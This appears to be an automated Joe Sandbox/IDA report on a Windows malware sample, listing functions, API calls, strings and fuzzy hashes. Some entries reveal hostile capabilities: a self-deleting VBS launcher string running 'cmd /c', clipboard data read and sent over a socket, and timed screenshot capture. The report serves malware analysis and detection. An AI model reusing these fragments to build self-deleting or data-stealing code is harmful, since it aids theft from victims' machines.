                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$0C[$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open$xdF
                                              • API String ID: 1913171305-66013450
                                              • Opcode ID: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                              • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                              • Opcode Fuzzy Hash: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                              • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                              Function 00414DC1 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$getaddrinfo
                                              • API String ID: 2490988753-3078833738
                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                              Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                              • _free.LIBCMT ref: 0045137F
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 004513A1
                                              • _free.LIBCMT ref: 004513B6
                                              • _free.LIBCMT ref: 004513C1
                                              • _free.LIBCMT ref: 004513E3
                                              • _free.LIBCMT ref: 004513F6
                                              • _free.LIBCMT ref: 00451404
                                              • _free.LIBCMT ref: 0045140F
                                              • _free.LIBCMT ref: 00451447
                                              • _free.LIBCMT ref: 0045144E
                                              • _free.LIBCMT ref: 0045146B
                                              • _free.LIBCMT ref: 00451483
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                              • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                              • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                              Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                              • API String ID: 489098229-1431523004
                                              • Opcode ID: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                              • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                              • Opcode Fuzzy Hash: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                              • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                              Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                              • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                              • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                              • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                              Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                              • closesocket.WS2_32(000000FF), ref: 00404E5A
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                              • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                              Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                              • GetLastError.KERNEL32 ref: 00455D6F
                                              • __dosmaperr.LIBCMT ref: 00455D76
                                              • GetFileType.KERNEL32(00000000), ref: 00455D82
                                              • GetLastError.KERNEL32 ref: 00455D8C
                                              • __dosmaperr.LIBCMT ref: 00455D95
                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                              • GetLastError.KERNEL32 ref: 00455F31
                                              • __dosmaperr.LIBCMT ref: 00455F38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                              • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                              • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                              • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                              Function 00453E03 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                              • __freea.LIBCMT ref: 00454083
                                              • __freea.LIBCMT ref: 0045408F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID: v%(/
                                              • API String ID: 201697637-2435473048
                                              • Opcode ID: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                              • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                              • Opcode Fuzzy Hash: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                              • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                              Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: \&G$\&G$`&G
                                              • API String ID: 269201875-253610517
                                              • Opcode ID: d7fd4124445081cfc97c5454a1c142f1a87d4c625925bb8ca3a98cb7b9f8d762
                                              • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                              • Opcode Fuzzy Hash: d7fd4124445081cfc97c5454a1c142f1a87d4c625925bb8ca3a98cb7b9f8d762
                                              • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                              Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                              • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                              • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                              • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                              Function 0041697B Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 46clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 0041697C
                                              • EmptyClipboard.USER32 ref: 0041698A
                                              • CloseClipboard.USER32 ref: 00416990
                                              • OpenClipboard.USER32 ref: 00416997
                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                              • CloseClipboard.USER32 ref: 004169BF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID: !D@$xdF
                                              • API String ID: 2172192267-3540039394
                                              • Opcode ID: f8122d187f84bcc61e207b62fa39c018abbf95af5271be06fc2a6e9b15f4b477
                                              • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                              • Opcode Fuzzy Hash: f8122d187f84bcc61e207b62fa39c018abbf95af5271be06fc2a6e9b15f4b477
                                              • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                              Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                              • __dosmaperr.LIBCMT ref: 0043A926
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                              • __dosmaperr.LIBCMT ref: 0043A963
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                              • __dosmaperr.LIBCMT ref: 0043A9B7
                                              • _free.LIBCMT ref: 0043A9C3
                                              • _free.LIBCMT ref: 0043A9CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 9262cdba7b4adcfb063e64ce379082e8e02018adb4241b1373288f504c0df5cf
                                              • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                              • Opcode Fuzzy Hash: 9262cdba7b4adcfb063e64ce379082e8e02018adb4241b1373288f504c0df5cf
                                              • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                              Function 0044ACC9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                              • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                              • __alloca_probe_16.LIBCMT ref: 0044AE40
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                              • __freea.LIBCMT ref: 0044AEB0
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • __freea.LIBCMT ref: 0044AEB9
                                              • __freea.LIBCMT ref: 0044AEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID: v%(/
                                              • API String ID: 3864826663-2435473048
